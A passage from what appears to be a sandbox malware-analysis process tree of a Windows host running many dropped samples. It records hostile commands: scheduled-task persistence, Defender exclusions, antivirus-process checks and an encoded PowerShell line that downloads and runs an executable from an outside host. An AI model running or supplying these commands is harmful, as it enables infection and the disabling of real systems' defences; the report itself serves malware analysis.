        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:2248
  - - C:\Users\Admin\AppData\Local\Temp\nsaDD18.tmp
      C:\Users\Admin\AppData\Local\Temp\nsaDD18.tmp
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
    3⤵
    PID:2564
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:2580
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:868
- - C:\Users\Admin\AppData\Local\Temp\rty25.exe
    "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
    3⤵
    PID:1164
- C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"
  2⤵
  PID:1604
- C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"
  2⤵
  PID:1532
- C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe"
  2⤵
  PID:1852
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\PortproviderwinMonitorSvc\mfKYow52WThs6WxYPgYy8SvlAX398RVKTuVkRNatbU.vbe"
    3⤵
    PID:2388
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\PortproviderwinMonitorSvc\vcwCtM23VtO7vZcBlCg44jyJmSVgI43HgFP0J6KvnQO3IbLY.bat" "
      4⤵
      PID:3088
    - - C:\PortproviderwinMonitorSvc\ContainerserverFontSavessession.exe
        
        "C:\PortproviderwinMonitorSvc/ContainerserverFontSavessession.exe"
        5⤵
        
        PID:3588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\sFjR0vEqkE.bat"
        6⤵
        
        PID:2628
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:3904
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        7⤵
        Runs ping.exe
        
        PID:3260
        
        C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe
        
        "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\windows.exe"
        7⤵
        
        PID:4012
- C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe"
  2⤵
  PID:2192
- C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
  2⤵
  PID:304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
    3⤵
    PID:3204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe'
    3⤵
    PID:2876
- C:\Users\Admin\AppData\Local\Temp\Files\install.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\install.exe"
  2⤵
  PID:3524
- - C:\Users\Admin\AppData\Local\Temp\Files\install.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\install.exe"
    3⤵
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35242\exe\netconn_properties.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35242\exe/netconn_properties.exe
      4⤵
      PID:2180
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:3636
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:3744
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:1564
- C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rwtweewge.exe"
  2⤵
  PID:3596
- C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  PID:3904
- - C:\Windows\System32\werfault.exe
    \??\C:\Windows\System32\werfault.exe
    3⤵
    PID:2596
- C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\clip.exe
    "C:\Windows\SysWOW64\clip.exe"
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
      "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
      4⤵
      PID:2388
- C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
  2⤵
  PID:3824
- - C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe"
    3⤵
    PID:3700
- C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\DefenderControl.exe"
  2⤵
  PID:3992
- C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
  2⤵
  PID:780
- - C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\07c0acc9cd9a6ae4af685344e28e0a756d3f3a77a60f607d3f90f493d7061108.exe"
    3⤵
    PID:3868
- C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe"
  2⤵
  PID:3080
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" & exit
    3⤵
    PID:2792
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe" /f
      4⤵
      Kills process with taskkill
      PID:1144
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_4.exe"
  2⤵
  PID:2984
- C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
  2⤵
  PID:2656
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3712
- C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"
  2⤵
  PID:3804
- - C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\865b3db67f0565e0b41e72aa036d78183c33dab95bd4be7b4f13aebda88ab0c0.exe"
    3⤵
    PID:1960
- C:\Users\Admin\AppData\Local\Temp\Files\native.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
  2⤵
  PID:3736
- C:\Users\Admin\AppData\Local\Temp\Files\superz.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\superz.exe"
  2⤵
  PID:3012
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup3.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup3.exe"
    3⤵
    PID:2360
- - C:\Users\Admin\AppData\Local\Temp\april.exe
    "C:\Users\Admin\AppData\Local\Temp\april.exe"
    3⤵
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\is-N0G2I.tmp\april.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-N0G2I.tmp\april.tmp" /SL5="$9031E,7683695,54272,C:\Users\Admin\AppData\Local\Temp\april.exe"
      4⤵
      PID:908
    - - C:\Users\Admin\AppData\Local\WebSocket connection routine\websocketconnectionroutine.exe
        
        "C:\Users\Admin\AppData\Local\WebSocket connection routine\websocketconnectionroutine.exe" -i
        5⤵
        
        PID:3324
    - - C:\Users\Admin\AppData\Local\WebSocket connection routine\websocketconnectionroutine.exe
        
        "C:\Users\Admin\AppData\Local\WebSocket connection routine\websocketconnectionroutine.exe" -s
        5⤵
        
        PID:3836
- - C:\Users\Admin\AppData\Local\Temp\c53cfff621a84792162f70e790980e38.exe
    "C:\Users\Admin\AppData\Local\Temp\c53cfff621a84792162f70e790980e38.exe"
    3⤵
    PID:2924
- C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\abtc8mhlbehqil.exe"
  2⤵
  PID:2696
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
    3⤵
    PID:1432
- C:\Users\Admin\AppData\Local\Temp\Files\costa.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\costa.exe"
  2⤵
  PID:4080
- - C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    PID:3360
- - C:\Users\Admin\AppData\Local\Temp\rty27.exe
    "C:\Users\Admin\AppData\Local\Temp\rty27.exe"
    3⤵
    PID:3428
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup8.exe"
    3⤵
    PID:3640
- C:\Users\Admin\AppData\Local\Temp\Files\l.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\l.exe"
  2⤵
  PID:3084
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe" hvasjw34favaawhnb68
    3⤵
    PID:3168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      PID:3296
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PSOBPDL" /tr "C:\ProgramData\Microsoft\PSOBPDL.exe"
      4⤵
      PID:1984
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PSOBPDL" /tr "C:\ProgramData\Microsoft\PSOBPDL.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:4780
- C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe"
  2⤵
  PID:1496
- C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fscan.exe"
  2⤵
  PID:3956
- C:\Users\Admin\AppData\Local\Temp\Files\National.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\National.exe"
  2⤵
  PID:2720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    PID:3536
- C:\Users\Admin\AppData\Local\Temp\Files\dota.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dota.exe"
  2⤵
  PID:4032
- C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
  2⤵
  - Launches sc.exe
  PID:2696
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  PID:3312
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:2616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:1772
- C:\Users\Admin\AppData\Local\Temp\Files\libc010url.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\libc010url.exe"
  2⤵
  PID:3988
- C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\c4fc1686ecf325a5432309a2fec15357f6ff849252747ef44de7b4f1f4d4d1c2.exe"
  2⤵
  PID:3156
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 48
    3⤵
    - Program crash
    PID:3316
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Cpp_1_3.exe"
  2⤵
  PID:2600
- C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Doublepulsar-1.3.1.exe"
  2⤵
  PID:2716
- C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe"
  2⤵
  PID:3388
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit
    3⤵
    PID:3264
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:1764
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:3428
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2696
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe"
        5⤵
        
        PID:4712
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3212
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c mkdir 13775
        5⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Cock + Enhance + Forest + Grocery + Mall 13775\Fighting.pif
        5⤵
        
        PID:4748
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 5 localhost
        5⤵
        Runs ping.exe
        
        PID:3480
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\13775\Fighting.pif
        
        13775\Fighting.pif 13775\Q
        5⤵
        
        PID:1084
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Amd + Backed 13775\Q
        5⤵
        
        PID:4524
- C:\Users\Admin\AppData\Local\Temp\Files\rty49.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty49.exe"
  2⤵
  PID:1728
- C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\_vti_cnf.exe"
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT /delete /yes
    3⤵
    PID:3716
  - - C:\Windows\SysWOW64\at.exe
      AT /delete /yes
      4⤵
      PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
    3⤵
    PID:4124
  - - C:\Windows\SysWOW64\at.exe
      AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
      4⤵
      PID:4244
- C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"
  2⤵
  PID:4192
- C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\csaff.exe"
  2⤵
  PID:4684
- - C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe
    "C:\Users\Admin\AppData\Local\SquirrelTemp\Update.exe" --install .
    3⤵
    PID:3120
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\csen.exe" --squirrel-firstrun
      4⤵
      PID:2756
  - - C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe
      "C:\Users\Admin\AppData\Local\CoinSurf\app-1.0.5\CoinSurf.WPF.exe" --squirrel-firstrun
      4⤵
      PID:4552
- C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"
  2⤵
  PID:2580
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
  2⤵
  PID:4372
- C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
  2⤵
  PID:5044
- C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"
  2⤵
  PID:5060
- C:\Users\Admin\AppData\Local\Temp\Files\wind.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wind.exe"
  2⤵
  PID:4280
- C:\Users\Admin\AppData\Local\Temp\Files\Wattyl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Wattyl.exe"
  2⤵
  PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT /delete /yes
    3⤵
    PID:3888
  - - C:\Windows\SysWOW64\at.exe
      AT /delete /yes
      4⤵
      PID:3204
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
    3⤵
    PID:4100
  - - C:\Windows\SysWOW64\at.exe
      AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
      4⤵
      PID:3872
- C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe"
  2⤵
  PID:4936
- C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
  2⤵
  PID:5008
- C:\Users\Admin\AppData\Local\Temp\Files\joekr1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\joekr1234.exe"
  2⤵
  PID:3280
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:4356
- C:\Users\Admin\AppData\Local\Temp\Files\up.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\up.exe"
  2⤵
  PID:4608
- C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe"
  2⤵
  PID:5108
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Files\Helper.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Files\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707792670 "
    3⤵
    PID:2052
- C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"
  2⤵
  PID:2420
- - C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"
    3⤵
    PID:2500
- C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
  2⤵
  PID:3268
- C:\Users\Admin\AppData\Local\Temp\Files\may.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\may.exe"
  2⤵
  PID:3256
- - C:\Users\Admin\AppData\Local\Temp\is-BDO90.tmp\may.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-BDO90.tmp\may.tmp" /SL5="$405A2,6647488,54272,C:\Users\Admin\AppData\Local\Temp\Files\may.exe"
    3⤵
    PID:3016
  - - C:\Users\Admin\AppData\Local\DVDBurnerXP\dvdburnerxp.exe
      "C:\Users\Admin\AppData\Local\DVDBurnerXP\dvdburnerxp.exe" -i
      4⤵
      PID:4616
- C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cpm.exe"
  2⤵
  PID:2224
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  PID:4340
- C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\RobluxCoins.exe"
  2⤵
  PID:5156
- - C:\Windows\system32\WerFault.exe
    WerFault
    3⤵
    PID:5496
- C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\891b6cff6879ab69ae185a5956987ec46daaf434c60c93589c9ac06e4a4f7005.exe"
  2⤵
  PID:5624
- C:\Users\Admin\AppData\Local\Temp\Files\LM.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\LM.exe"
  2⤵
  PID:5712
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 92
    3⤵
    - Program crash
    PID:5792
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:5820
- C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
  2⤵
  PID:5764
- - C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
    3⤵
    PID:5364
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  PID:5584
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:5188
- C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe"
  2⤵
  PID:5504
- C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
  2⤵
  PID:4444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAcAB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQB0AG8AbwBsAC4AYwBvAG0ALwBnAGUAdAAuAGUAeABlACcALAAgADwAIwBuAGsAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAdgBrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGcAZQB0AC4AZQB4AGUAJwApACkAPAAjAHMAYwBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZQBhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBoAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBnAGUAdAAuAGUAeABlACcAKQA8ACMAYwB3AHUAIwA+AA=="
1⤵
PID:612
- C:\Users\Admin\AppData\Roaming\get.exe
  "C:\Users\Admin\AppData\Roaming\get.exe"
  2⤵
  PID:2712
- - C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe
    "C:\Users\Admin\AppData\Roaming\SecurityHealthSystray.exe"
    3⤵
    PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\Bypass.exe'
      4⤵
      PID:820
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "Bypass" /SC ONLOGON /TR "C:\Windows\System32\Bypass.exe" /RL HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:2424
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpEE26.tmp.bat""
      4⤵
      PID:1068
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:856
  - - C:\Windows\System32\Bypass.exe
      "C:\Windows\System32\Bypass.exe"
      4⤵
      PID:1640
- - C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
    "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
    3⤵
    PID:2460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe'
      4⤵
      PID:284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
      4⤵
      PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSecurity.exe'
      4⤵
      PID:3048
  - - C:\Windows\System32\schtasks.exe
